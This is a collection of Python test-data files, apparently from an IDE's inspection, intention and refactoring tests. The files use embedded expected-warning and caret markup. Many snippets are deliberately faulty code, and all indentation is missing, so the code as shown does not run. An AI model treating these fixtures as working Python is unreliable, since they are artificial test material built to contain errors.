#### File: inspections/PyMethodMayBeStaticInspection/superSamePy3.py
```python
class B:
def foo(self, text):
print(type(self), text)
class C(B):
def foo(self, text):
super().foo(text)
```
#### File: inspections/PyMethodOverridingInspection/ArgsKwargsAsAllowAnything.py
```python
class B1:
def foo(self, a, b):
pass
class C1(B1):
def foo(self, *b):
pass
class B2:
def foo(self, **kwargs):
pass
class C2(B2):
def foo(self):
pass
class B3:
def foo(self, *args):
pass
class C3(B3):
def foo(self):
pass
```
#### File: inspections/PyMethodOverridingInspection/LessParametersAndKwargs.py
```python
class B:
def foo(self, arg1, arg2=None, arg3=None, arg4=None):
pass
class C(B):
def foo(self, arg1, arg2=None, arg3=None, **kwargs): #pass
pass
```
#### File: inspections/PyNoneFunctionAssignmentInspection/pass.py
```python
__author__ = 'ktisha'
def foo():
pass
<weak_warning descr="Function 'foo' doesn't return anything">b = foo()</weak_warning>
```
#### File: inspections/PyNumpyType/ArrayLike.py
```python
def asarray(a, dtype=None, order=None):
"""Convert the input to an array.
Parameters
----------
a : array_like
Input data, in any form that can be converted to an array. This
includes lists, lists of tuples, tuples, tuples of tuples, tuples
of lists and ndarrays.
dtype : data-type, optional
By default, the data-type is inferred from the input data.
order : {'C', 'F'}, optional
Whether to use row-major (C-style) or
column-major (Fortran-style) memory representation.
Defaults to 'C'.
Returns
-------
out : ndarray
Array interpretation of `a`. No copy is performed if the input
is already an ndarray with matching dtype and order. If `a` is a
subclass of ndarray, a base class ndarray is returned.
"""
return array(a, dtype, copy=False, order=order)
asarray(10)
```
#### File: inspections/PyPep8NamingInspection/functionName.py
```python
def <weak_warning descr="Function name should be lowercase">doStuff</weak_warning>(a): print a
```
#### File: inspections/PyPep8NamingInspection/globals.py
```python
from contextlib import contextmanager
MUST_REFRESH_CACHE = False
@contextmanager
def fresh_per_request_cache():
global MUST_REFRESH_CACHE
orig = MUST_REFRESH_CACHE
MUST_REFRESH_CACHE = True
try:
yield
finally:
MUST_REFRESH_CACHE = orig
```
#### File: PyPep8NamingInspection/ignored/ignoreOnlyOneError.py
```python
def do_stuff(): pass
class <weak_warning descr="Class names should use CamelCase convention">cls</weak_warning>:
def <weak_warning descr="Function name should be lowercase">FuNc</weak_warning>(self,
<weak_warning descr="Argument name should be lowercase">Arg</weak_warning>):
Test = do_stuff()
```
#### File: PyPep8NamingInspection/test/a.py
```python
from unittest import TestCase
class TestX(TestCase):
def testFoo(self):
self.assertTrue(True)
```
#### File: inspections/PyPropertyAccessInspection/overrideAssignment.py
```python
def test_property_override_assignment():
class B(object):
@property
def foo(self):
return 0
@property
def bar(self):
return -1
@property
def baz(self):
return -2
class C(B):
foo = 'foo'
def baz(self):
return 'baz'
def f(self, x):
self.foo = x
<warning descr="Property 'bar' cannot be set">self.bar</warning> = x
self.baz = x
```
#### File: PyProtectedMemberInspection/MemberResolvedToStub/a.py
```python
class Test:
@classmethod
def foo1(cls):
return cls._bar()
def foo2(self, t: Test):
return t._bar()
@staticmethod
def _bar(self):
pass
```
#### File: inspections/PyProtectedMemberInspection/selfField.py
```python
class B:
def __call__(self, event):
self._call_on_plugins("foo")
```
#### File: inspections/PyRedeclarationInspection/conditional.py
```python
def test_conditional(c):
def foo():
pass
if c:
def foo():
pass
try:
def foo():
pass
except:
pass
```
#### File: inspections/PyRedeclarationInspection/staticMethodRedeclaresInstanceMethod.py
```python
class TestClass:
def foo(self):
print(0)
@staticmethod
def <warning descr="Redeclared 'foo' defined above without usage">foo</warning>():
print(1)
```
#### File: inspections/PyRedeclarationInspection/topLevelOverloadImplementationOverloadImplementation.py
```python
from typing import overload
@overload
def foo(value: int) -> str:
pass
def foo(value):
return None
@overload
def foo(value: str) -> str:
pass
def <warning descr="Redeclared 'foo' defined above without usage">foo</warning>(value):
return None
```
#### File: inspections/PyRedeclarationInspection/underscorePrefixed.py
```python
def foo(_a):
_a = 10
l = lambda _a: [_a for _a in []]
f2e = [(f, e) for _a, e, f in [(1, 2, 3)]]
e2f = [(e, f) for <warning descr="Redeclared '_a' defined above without usage">_a</warning>, e, f in [(1, 2, 3)]]
array = [1, 2, 3]
<warning descr="Redeclared '_a' defined above without usage">_a</warning>, mid, <warning descr="Redeclared '_a' defined above without usage">_a</warning> = array
```
#### File: inspections/PyRedundantParenthesesInspection/Return.py
```python
def f1(x):
return (x, *x)
def f2(x):
return <weak_warning descr="Remove redundant parentheses">(x, x)</weak_warning>
```
#### File: inspections/PyStringFormatInspection/NewStyleCallExpressionArgument.py
```python
def f(mode):
if mode == "i":
return 1
elif mode == "f":
return 1.0
elif mode == "s":
return ""
elif mode == "b":
return True
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("i"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("f"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("s"))
<warning descr="Too few arguments for format string">"{}{}"</warning>.format(f("b"))
```
#### File: inspections/PyStringFormatInspection/PercentStringCallArgument.py
```python
def bar():
return 1
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return 1.0
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return ""
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return True
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return []
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return {}
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
def bar():
return set()
"%s %s" % <warning descr="Too few arguments for format string">bar()</warning>
```
#### File: inspections/PyTypeCheckerInspection/Assignment.py
```python
def f():
x1: int = <warning descr="Expected type 'int', got 'str' instead">'foo'</warning>
x2: str = 'bar'
x3: int = 0
x4: str = <warning descr="Expected type 'str', got 'int' instead">1</warning>
```
#### File: inspections/PyTypeCheckerInspection/CallableInstanceAgainstCallable.py
```python
from typing import Dict
class Key:
def __call__(self, obj):
pass
def foo(d: Dict[str, int]):
print(sorted(d.items(), key=Key()))
```
#### File: inspections/PyTypeCheckerInspection/ComparisonOperators.py
```python
def test():
def f(x):
"""
:type x: str
"""
pass
class C(object):
def __gt__(self, other):
return []
o = object()
c = C()
f(<warning descr="Expected type 'str', got 'bool' instead">1 < 2</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o == o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o >= o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">'foo' > 'bar'</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead"><warning descr="Expected type 'int', got 'C' instead">c</warning> < 1</warning>)
f(<warning descr="Expected type 'str', got 'list' instead">c > 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c == 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c in [1, 2, 3]</warning>)
```
#### File: inspections/PyTypeCheckerInspection/DictLiteralIndexing.py
```python
def test(k1, v1):
d = {k1: v1}
return 1 + d[k1]
```
#### File: PyTypeCheckerInspection/FieldWithNoneInStub/a.py
```python
from m1 import C
def f(x):
"""
:type x: int
"""
pass
def test():
f(C.foo)
```
#### File: inspections/PyTypeCheckerInspection/GeneratorAnnotatedToReturnIterable.py
```python
from typing import Iterable
def g1() -> Iterable[int]:
for i in range(10):
yield i
def g2() -> Iterable[int]:
yield 42
return None
def g3() -> Iterable:
yield 42
def g4() -> Iterable:
yield 42
return None
```
#### File: PyTypeCheckerInspection/InitializingDataclass/a.py
```python
import dataclasses
import typing
@dataclasses.dataclass
class A:
x: int
y: str
z: float = 0.0
A(1, "a")
A(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
A(1, "a", 1.0)
A(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>, <warning descr="Expected type 'float', got 'str' instead">"b"</warning>)
@dataclasses.dataclass(init=True)
class A2:
x: int
y: str
z: float = 0.0
A2(1, "a")
A2(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
A2(1, "a", 1.0)
A2(<warning descr="Expected type 'int', got 'str' instead">"a"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>, <warning descr="Expected type 'float', got 'str' instead">"b"</warning>)
@dataclasses.dataclass(init=False)
class B1:
x: int = 1
y: str = "2"
z: float = 0.0
B1(1)
B1("1")
B1(1, "a")
B1("a", 1)
B1(1, "a", 1.0)
B1("a", 1, "b")
@dataclasses.dataclass(init=False)
class B2:
x: int
y: str
z: float = 0.0
def __init__(self, x: int):
self.x = x
self.y = str(x)
self.z = 0.0
B2(1)
B2(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class C1:
a: typing.ClassVar[int]
b: int
C1(1)
C1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class C2:
a: typing.ClassVar
b: int
C2(1)
C2(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class D1:
a: dataclasses.InitVar[int]
b: int
D1(1, 2)
D1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'int', got 'str' instead">"2"</warning>)
@dataclasses.dataclass
class E1:
a: int = dataclasses.field()
b: str = dataclasses.field(init=True)
c: int = dataclasses.field(init=False)
d: bytes = dataclasses.field(default=b"b")
e: int = dataclasses.field(default_factory=int)
E1(1, "1")
E1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'str', got 'int' instead">1</warning>)
E1(1, "1", b"1")
E1(<warning descr="Expected type 'int', got 'bytes' instead">b"1"</warning>, "1", <warning descr="Expected type 'bytes', got 'int' instead">1</warning>)
E1(1, "1", b"1", 1)
E1(<warning descr="Expected type 'int', got 'str' instead">"1"</warning>, <warning descr="Expected type 'str', got 'bytes' instead">b"1"</warning>, <warning descr="Expected type 'bytes', got 'str' instead">"1"</warning>, <warning descr="Expected type 'int', got 'str' instead">"1"</warning>)
@dataclasses.dataclass
class F1:
foo = "bar" # <- has no type annotation, so doesn't count.
baz: str
F1("1")
F1(<warning descr="Expected type 'str', got 'int' instead">1</warning>)
```
#### File: inspections/PyTypeCheckerInspection/IterateOverParamWithNoAttributes.py
```python
def f(xs):
ys = 'string'
for x in xs:
g(ys)
def g(x):
return x.lower()
```
#### File: inspections/PyTypeCheckerInspection/KeywordArguments.py
```python
def foo(**kwargs):
"""
:type kwargs: int
"""
pass
foo(key1=10, <warning descr="Expected type 'int', got 'str' instead">key2="str"</warning>)
```
#### File: inspections/PyTypeCheckerInspection/NamedTupleBaseClass.py
```python
from collections import namedtuple
class C(namedtuple('C', ['foo', 'bar'])):
pass
def f(x):
return x.foo, x.bar
def g():
x = C(foo=0, bar=1)
return f(x)
print(g())
```
#### File: inspections/PyTypeCheckerInspection/NewTypeAsParameter.py
```python
from typing import NewType
UserId = NewType("UserId", int)
def get_user(user: UserId) -> str:
pass
get_user(UserId(5))
get_user(<warning descr="Expected type 'UserId', got 'str' instead">"John"</warning>)
get_user(<warning descr="Expected type 'UserId', got 'int' instead">4</warning>)
```
#### File: PyTypeCheckerInspection/NotImportedClassInDocString/a.py
```python
def f(x):
"""
:type x: p1.m1.Foo
"""
def test():
f(<warning descr="Expected type 'Foo', got 'int' instead">10</warning>)
```
#### File: inspections/PyTypeCheckerInspection/PromotingBytearrayToStrAndUnicode.py
```python
def f(bar):
# type: (str) -> str
return bar
f(bytearray())
```
#### File: inspections/PyTypeCheckerInspection/TypingListSubscriptionExpression.py
```python
from typing import List, Any
def f(x1: List[str],
x2: List['str'],
x3: List[Any]) -> None:
pass
```
#### File: inspections/PyTypeCheckerInspection/TypingProtocolAgainstProtocol.py
```python
from typing import Protocol
class MyProtocol1(Protocol):
attr: int
def func(self, p: int) -> str:
pass
class MyProtocol2(Protocol):
attr: int
more_attr: int
def func(self, p: int) -> str:
pass
def more_func(self, p: str) -> int:
pass
class MyProtocol3(Protocol):
attr: str
more_attr: str
def func(self, p: str) -> int:
pass
def more_func(self, p: int) -> str:
pass
def foo(p: MyProtocol1):
pass
v1: MyProtocol2
v2: MyProtocol3
foo(v1)
foo(<warning descr="Expected type 'MyProtocol1', got 'MyProtocol3' instead">v2</warning>)
```
#### File: inspections/PyUnboundLocalVariableInspection/LocalFunctionAndVariable.py
```python
def x(arg):
def foo(): pass
if arg: foo = None
callee(foo) #pass
```
#### File: inspections/PyUnboundLocalVariableInspection/PositiveIteration.py
```python
def test1():
for i in "abc":
j = 1
print(j)
def test2():
for i in (1, 2):
j = 1
print(j)
def test3():
for i in [1, 2]:
j = 1
print(j)
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundConditionalImport.py
```python
def f(c):
if c:
import sys
return <warning descr="Local variable 'sys' might be referenced before assignment">sys</warning>
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundNestedComprehension.py
```python
def f(xs):
# vs is unbound
return [(k, v) for v in <warning descr="Local variable 'vs' might be referenced before assignment">vs</warning>
for k, vs in xs.items()]
```
#### File: inspections/PyUnboundLocalVariableInspection/UnboundNonLocal.py
```python
def f1():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
def f2():
def g():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
print(x)
x = 1
def f3():
nonlocal <warning descr="Nonlocal variable 'x' must be bound in an outer function scope">x</warning> #fail
x = 2
def f4():
x = 0
def g():
nonlocal x #pass
x = 2
return x
return g()
```
#### File: inspections/PyUnresolvedReferencesInspection3K/asyncInitMethod.py
```python
class A:
<error descr="function \"__init__\" cannot be async">async</error> def __init__(self):
self.foo = '2'
self.bar = '3'
a = A()
print(a.foo)
```
#### File: inspections/PyUnresolvedReferencesInspection3K/descriptorAttribute.py
```python
from typing import Any
class StringDescriptor:
def __get__(self, instance, owner):
return 'foo'
class AnyDescriptor:
def __get__(self, instance, owner) -> Any:
return 'bar'
class ListDescriptor:
def __get__(self, instance: Any, owner: Any) -> list:
return 'baz'
class C:
foo = StringDescriptor()
bar = AnyDescriptor()
baz = ListDescriptor()
# Instance level
c = C()
c.foo.upper()
c.foo.<warning descr="Unresolved attribute reference 'non_existent' for class 'str'">non_existent</warning>()
c.bar.upper()
c.bar.non_existent()
c.baz.append()
c.baz.<warning descr="Unresolved attribute reference 'non_existent' for class 'list'">non_existent</warning>()
# Class level
C.foo.upper()
C.foo.<warning descr="Unresolved attribute reference 'non_existent' for class 'str'">non_existent</warning>()
C.bar.upper()
C.bar.non_existent()
```
#### File: inspections/PyUnresolvedReferencesInspection3K/metaclassMethods.py
```python
class M(type):
def baz(cls):
pass
class B(object):
def bar(self):
pass
class C(B, metaclass=M):
def foo(self):
pass
C.foo()
C.bar()
C.baz()
c = C()
c.foo()
c.bar()
c.<warning descr="Unresolved attribute reference 'baz' for class 'C'">baz</warning>()
```
#### File: PyUnresolvedReferencesInspection3K/MetaclassStub/m1.py
```python
class M(type):
def foo(cls):
pass
class C(metaclass=M):
pass
```
#### File: inspections/PyUnresolvedReferencesInspection3K/namedTuple.py
```python
from collections import namedtuple
Point = namedtuple('Point', ['x', 'y'], verbose=True)
print(Point.x, Point.y)
p = Point(11, y=22)
print(p.x + p.y + p.<warning descr="Unresolved attribute reference 'z' for class 'Point'">z</warning>)
print(p.__add__)
print(p._asdict())
print(Point._fields)
print(p._replace)
if isinstance(p, Point):
p.x
class C(namedtuple('C', 'x y')):
def f(self):
return self
c = C()
print(c.x, c.y, c.<warning descr="Unresolved attribute reference 'z' for class 'C'">z</warning>, c.f())
```
#### File: inspections/PyUnresolvedReferencesInspection3K/objectNewAttributes.py
```python
class C(object):
def __new__(cls):
self = object.__new__(cls)
self.foo = 1
return self
x = C()
print(x.foo)
print(x.<warning descr="Unresolved attribute reference 'bar' for class 'C'">bar</warning>)
```
#### File: PyUnresolvedReferencesInspection3K/PreferImportedModuleOverNamespacePackage/c.py
```python
class A:
def foo(self):
return "module"
```
#### File: inspections/PyUnresolvedReferencesInspection3K/typingIterableDunderGetItem.py
```python
import typing
def myfunc(seq: typing.Iterable[str]):
pass
```
#### File: PyUnresolvedReferencesInspection3K/UsageOfFunctionDecoratedWithTypesCoroutine/a.py
```python
import types
import asyncio
@types.coroutine
def foo():
yield from asyncio.sleep(1)
return 3
async def bar():
return await foo() * 2
```
#### File: inspections/PyUnresolvedReferencesInspection/classInClassBody.py
```python
class C:
print(<error descr="Unresolved reference 'C'">C</error>) #fail
def f(self):
print(C) #pass
```
#### File: inspections/PyUnresolvedReferencesInspection/decoratedFunction.py
```python
def decorator(f):
return f
def f(x):
return x
@decorator
def g(x):
return x
print(f.<warning descr="Cannot find reference 'foo' in 'function'">foo</warning>) #fail
print(g.bar) #pass
```
#### File: PyUnresolvedReferencesInspection/DunderAll/m3.py
```python
t = ["m3m2"]
__all__ = ["m3m1"]
__all__.extend(t)
def m3m1():
pass
def m3m2():
pass
def m3m3():
pass
```
#### File: PyUnresolvedReferencesInspection/DynamicDunderAll/m1.py
```python
__all__ = ["m1m1"] + abc
__all__.append("m1m2")
def m1m1():
pass
def m1m2():
pass
```
#### File: inspections/PyUnresolvedReferencesInspection/forwardReferencesInClassBody.py
```python
class A1:
foo = <error descr="Unresolved reference 'B1'">B1</error>()
class B1:
pass
class A21:
class A22:
bar = <error descr="Unresolved reference 'B2'">B2</error>()
class B2:
pass
class A31:
def baz(self):
class A32:
egg = B3()
class B3:
pass
```
#### File: PyUnresolvedReferencesInspection/MetaClassMembersInStubs/b.py
```python
class GenericMeta(type):
def __getitem__(self, args):
pass
class Generic(object):
__metaclass__ = GenericMeta
```
#### File: PyUnresolvedReferencesInspection/NonexistentLoggerMethod/logging.py
```python
def getLogger():
pass
class Logger(object):
def exception(self, msg):
pass
```
#### File: inspections/PyUnresolvedReferencesInspection/ownSlots.py
```python
def access1():
class B(object):
__slots__ = ['foo']
b = B()
print(b.<warning descr="Unresolved attribute reference 'baz' for class 'B'">baz</warning>)
print(b.foo)
def assign1():
class B(object):
__slots__ = ['foo']
b = B()
b.<warning descr="'B' object has no attribute 'bar'">bar</warning> = 1
b.foo = 1
def access2():
class A:
__slots__ = ['foo']
a = A()
print(a.<warning descr="Unresolved attribute reference 'foo' for class 'A'">foo</warning>)
print(a.<warning descr="Unresolved attribute reference 'bar' for class 'A'">bar</warning>)
def assign2():
class A:
__slots__ = ['foo']
a = A()
a.foo = 1
a.bar = 1
```
#### File: inspections/PyUnresolvedReferencesInspection/propertyNotListedInSlots.py
```python
class O(object):
__slots__ = ["a"]
def __init__(self):
self.b = 1
@property
def b(self):
return self.a
@b.setter
def b(self, value):
self.a = value
inst = O()
inst.b = 42
print(inst.a)
```
#### File: inspections/PyUnresolvedReferencesInspection/propertyType.py
```python
class Parent(object):
"""
parent class to show a simply property
"""
@property
def attribute(self):
"""
some attribute in parent
"""
return True
class Child(Parent):
"""
child class
"""
@property
def attribute(self):
"""
do something before execute code of parent attribute
"""
print "i'm the child"
return Parent.attribute.fget(self)
if __name__ == '__main__':
child = Child()
print child.attribute
```
#### File: inspections/PyUnresolvedReferencesInspection/returnSelfInSuperClass.py
```python
class C(object):
def get_self(self):
return self
class D(C):
def foo(self):
pass
d = D()
print(d.foo())
print(d.get_self().foo()) # pass
d = D()
print(D.foo(d))
print(D.get_self(d).foo(d)) # pass
```
#### File: PyUnresolvedReferencesInspection/StubsOfNestedClasses/a.py
```python
from b import Class2
class Class3(Class2):
class SubClass3(Class2.SubClass2):
def __init__(self, foo):
Class2.SubClass2.__init__(self, foo)
def test(self):
print(self.foo)
```
#### File: inspections/PyUnresolvedReferencesInspection/superclassAsLocal.py
```python
class A(object):
def method(self):
pass
C = A
class B(C):
pass
b = B()
b.method() #Unresolved attribute reference 'method' for class 'B'
```
#### File: inspections/PyUnresolvedReferencesInspection/typeAssertions.py
```python
def f(x):
if isinstance(x, list):
x = []
elif isinstance(x, dict):
return x.items() #pass
```
#### File: inspections/PyUnresolvedReferencesInspection/unresolvedSubscriptionOnClass.py
```python
class Foo(object):
def __getitem__(self, item):
return item
Foo<warning descr="Class 'type' does not define '__getitem__', so the '[]' operator cannot be used on its instances">[</warning>0]
```
#### File: inspections/PyUnusedLocalInspection/callingLocalsLeadsToUnusedParameter.py
```python
def outer(arg_one):
def inner():
print(locals())
print(arg_one)
return inner
```
#### File: inspections/PyUnusedLocalInspection/parameterInMethodWithEllipsis.py
```python
class A:
def bar(self, p):
...
```
#### File: inspections/PyUnusedLocalInspection/singleUnderscore.py
```python
def foo():
l = [42 for _ in xrange(100)]
print(l)
```
#### File: inspections/PyUnusedLocalInspection/tupleUnpacking.py
```python
def foo():
for x, y in [(1, 2)]:
print x
def test_vlu():
<error descr="Python version 2.6 does not support starred expressions as assignment targets">*<weak_warning descr="Local variable 'h' value is not used">h</weak_warning></error>, <weak_warning descr="Local variable 't' value is not used">t</weak_warning> = [1, 2, 3] # fail
def test_vlu():
<error descr="Python version 2.6 does not support starred expressions as assignment targets">*h</error>, t = [1, 2, 3] # pass
print(t)
```
#### File: testData/inspections/RenameUnresolvedReference.py
```python
def foo(y1):
<error descr="Unresolved reference 'y'">y<caret></error> + 1
print <error descr="Unresolved reference 'y'">y</error>
```
#### File: testData/intentions/convertStaticMethodToFunctionUsage.py
```python
class MyClass(object):
"""
My class to show intention.
"""
def __init__(self):
self.a = 1
@staticmethod
def my_<caret>static_method():
import code
import time
time.sleep(100)
print code
MyClass().my_static_method()
```
#### File: testData/intentions/convertVariadicParamKeywordContainerPop.py
```python
def foo(w, <caret>q = 2, **kwargs):
a = kwargs.pop('tmp')
doSomething(kwargs.pop('foo', 22))
doSomething(kwargs.pop('bar', default=23))
```
#### File: testData/intentions/convertVariadicParamNotOverriddenInNested_after.py
```python
def outer(foo, bar=None, **kwargs):
def nested():
print(foo)
return bar
```
#### File: testData/intentions/convertVariadicParamOverriddenInNested_after.py
```python
def outer(bar=None, **kwargs):
def nested(**kwargs):
print(kwargs['foo'])
return bar
```
#### File: testData/intentions/convertVariadicParamPositionalContainerInPy3_after.py
```python
def foo(baz=None, *args, bar, **kwargs<caret>):
return bar
```
#### File: testData/intentions/joinIf_after.py
```python
def foo():
if a + 2 > 3 and b < 4:
a = a and b
b = 4
```
#### File: testData/intentions/numpyAddMissingParameterPreservesNoneIndent_after.py
```python
def f(param1, param2):
"""
Parameters
----------
param1
param2 : object
"""
```
#### File: testData/intentions/numpyAddMissingParameterPreservesNoneIndent.py
```python
def <caret>f(param1, param2):
"""
Parameters
----------
param2 : object
"""
```
#### File: testData/intentions/paramTypeInGoogleDocStringParamDeclaredNoParenthesis.py
```python
def f(<caret>x, y):
"""
Summary.
Parameters:
x : foo
"""
```
#### File: intentions/PyAnnotateTypesIntentionTest/methodAfterConstructorCall.py
```python
class MyClass:
def __init__(self):
pass
def method(self, x):
pass
x = MyClass()
foo = x.met<caret>hod(42)
```
#### File: intentions/PyAnnotateVariableTypeIntentionTest/annotationAugmentedAssignment.py
```python
def func():
var = 0
var += 1
v<caret>ar
```
#### File: PyAnnotateVariableTypeIntentionTest/AnnotationImportTypingAny/main.py
```python
def func(x):
var = {'foo': x}
v<caret>ar
```
#### File: intentions/PyAnnotateVariableTypeIntentionTest/typeCommentLocalWithTarget_after.py
```python
from typing import BinaryIO
def func():
with open('file.txt') as var: # type: [BinaryIO]
var
```
#### File: intentions/PyConvertMethodToPropertyIntentionTest/simple_after.py
```python
class MyClass(object):
"""
My class to show intention.
"""
def __init__(self):
self._x = None
@property
def x(self):
return self._x
x = MyClass().x
```
#### File: testData/intentions/restNoReturnTagForInit_after.py
```python
class C:
def __init__(self, x, y):
"""
:param x:
:param y:
"""
return None
```
#### File: testData/intentions/typeAssertion4_after.py
```python
def foo3(x, y):
assert isinstance(y, object)
i = x + y
return i
```
#### File: testData/intentions/typeAssertion4.py
```python
def foo3(x, y):
i = x + <caret>y
return i
```
#### File: testData/intentions/typeAssertion_after.py
```python
def foo(a, b):
assert isinstance(a, object)
a.
b = 1
```
#### File: testData/intentions/typeInDocstring2.py
```python
def func1(x):
return x
def func2(x):
y = fu<caret>nc1(x.keys())
return y.startswith('foo')
```
#### File: testData/mover/indentedOneLine.py
```python
def a():
if True: a = 1
else:
c = <caret>1
b = 2
```
#### File: testData/mover/with_afterDown.py
```python
def temp(filepath):
a = 1
with open(filepath) as f:
for line in l:
l = f.readlines()
a = 1
```
#### File: testData/override/classmethod.py
```python
class A:
@classmethod
def foo(cls):
cls.k = 3
class B(A):
<caret>pass
```
#### File: testData/override/dunderNewPy3k_after.py
```python
class BaseMeta(type):
def __new__(cls, name, bases, namespace):
return super().__new__(cls, name, bases, namespace)
class MyMeta(BaseMeta):
def __new__(cls, name, bases, namespace):
return super().__new__(cls, name, bases, namespace)
```
#### File: testData/override/importsForTypeAnnotations1_after.py
```python
from .importsForTypeAnnotations1_import import Foo
class Bar(Foo):
def func(self, arg: int) -> int:
return super().func(arg)
```
#### File: testData/override/qualified_after.py
```python
import datetime
class MyDate(datetime.date):
def __init__(self, year, month, day):
<selection>super(MyDate, self).__init__(year, month, day)</selection>
```
#### File: testData/override/returnAnnotation.py
```python
class A():
def some_method(self) -> "return value":
pass
class B(A):
pass
```
#### File: testData/override/returnValue_after.py
```python
class A:
def doStuff(self, foo=True): return True
class B(A):
def doStuff(self, foo=True):
<selection>return A.doStuff(self, foo)</selection>
def otherMethod(self, foo, bar):
print foo, bar
```
#### File: testData/override/returnValue.py
```python
class A:
def doStuff(self, foo=True): return True
class B(A):
def otherMethod(self, foo, bar):
print foo, bar
```
#### File: testData/override/staticMethodPy3k_after.py
```python
class A:
@staticmethod
def m(x, y):
pass
class B(A):
@staticmethod
def m(x, y):
<selection>super().m(x, y)</selection>
```
#### File: testData/override/staticMethodPy3k.py
```python
class A:
@staticmethod
def m(x, y):
pass
class B(A):
<caret>pass
```
#### File: testData/paramInfo/BoundMethodSimple.py
```python
class A(object):
def foo(self, a, b):
pass
f = A().foo
f(<arg1>1, <arg2>2)
```
#### File: testData/paramInfo/ConstructorFactory.py
```python
class Foo(object):
def __init__(self, color):
self.color = color
class Bar(object):
fooFactory = Foo
def quux(self):
foo = self.fooFactory(<arg>"orange") #
```
#### File: paramInfo/DataclassesMixedHierarchyReplace/dataclasses.py
```python
def dataclass(_cls=None, *, init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=False):
pass
def replace(obj, **changes):
pass
```
#### File: testData/paramInfo/KwdArgOutOfOrder.py
```python
def foo(a, b, c):
pass
foo(<arg1>b=2, <arg2>**{'a':1, <arg2a>'c':3})
```
#### File: testData/paramInfo/NestedMultiArg.py
```python
def foo(a, (b, c), d):
pass
foo(<arg1>1, <arg23>range(2), <arg4>4)
```
#### File: testData/paramInfo/StarredFunction.py
```python
def foo(a, b, *c):
pass
foo(<arg1>1, <arg2>2, <arg3>3, <arg4>4)
```
#### File: testData/paramInfo/TupleAndNamedArg1.py
```python
def f(a, b, c):
pass
f(<arg_c>c=1, *(10, <arg_star>20))
```
#### File: postfix/isNotNone/complexExpression_after.py
```python
def f(a, b, c):
if (a + b) * c is not None:
<caret>
```
#### File: postfix/isNotNone/function_after.py
```python
def f(a):
if a is not None:
<caret>
```
#### File: postfix/return/if_after.py
```python
def d(a):
if a:
return 1
else:
return 2
```
#### File: testData/psi/AsyncFor.py
```python
async def f():
async for x in xs:
pass
async for y in ys:
pass
```
#### File: testData/psi/AwaitInNonAsyncNestedFunction.py
```python
import asyncio
async def connect():
def callback():
return await asyncio.sleep(5)
return await asyncio.sleep(5)
```
#### File: testData/psi/CommentBetweenClasses.py
```python
class T1(object):
def m1(self):
pass
# comment about T2
class T2(object):
def m2(self):
pass
```
#### File: testData/psi/EmptyBlockInFunctionBeforeFunction.py
```python
def foo(xs):
for x in xs:
def bar():
pass
```
#### File: type/comparisonOperatorOverloads/lib.py
```python
class MyClass:
def __init__(self, *args):
pass
def __lt__(self, other):
pass
def __gt__(self, other):
return True
```
#### File: type/instanceAttributeAnnotation/InstanceAttributeAnnotation.py
```python
class C:
def __init__(self):
self.attr = None
C().at<caret>tr
```
#### File: type/overloadedNotMatchedGenericType/OverloadedNotMatchedGenericType.py
```python
from typing import Any
from m1 import C
def f(x: list):
c = C()
<caret>expr = c.foo(non_existing=0)
```
#### File: type/overloadedNotMatchedType/OverloadedNotMatchedType.py
```python
from typing import Any
from m1 import C
def f(x: Any):
c = C()
<caret>expr = c.foo(x)
```
#### File: testData/quickdoc/AncestorClassDocstringForConstructor.py
```python
class Base:
"""Class docstring."""
class Sub(Base):
def __in<the_ref>it__(self):
pass
```
#### File: testData/quickdoc/ClassUndocumentedConstructor.py
```python
class Foo(object):
"<the_doc>Doc of Foo."
def __init__(self):
pass
<the_ref>Foo()
```
#### File: testData/quickdoc/ExceptionDescriptionRest.py
```python
def fu<the_ref>nc():
"""
:raises Exception1
:raise Exception2: bar
:except Exception3:
:exception Exception4: foo
"""
pass
```
#### File: testData/quickdoc/KeywordArgsDescriptionEpydoc.py
```python
def fu<the_ref>nc(**args):
"""
@kwarg foo: bar
@keyword baz:
@kwparam quux:
"""
```
#### File: testData/quickdoc/KeywordArgsDescriptionForMissingParameter.py
```python
class Base:
def method(self, **kwargs):
"""
:key foo: foo
:key bar: bar
:key baz:
"""
class Sub(Base):
def met<the_ref>hod(self, *, foo, bar):
super().method(foo=foo, bar=bar)
```
#### File: testData/quickdoc/KeywordArgsDescriptionGoogle.py
```python
def fu<the_ref>nc(**args):
"""
Keyword args:
foo: bar
baz
Keyword arguments:
quux
"""
```
#### File: testData/quickdoc/OptionalAndUnionTypesContainingTypeVars.py
```python
from typing import TypeVar, Optional, Union, Tuple, Any
T = TypeVar('T', int)
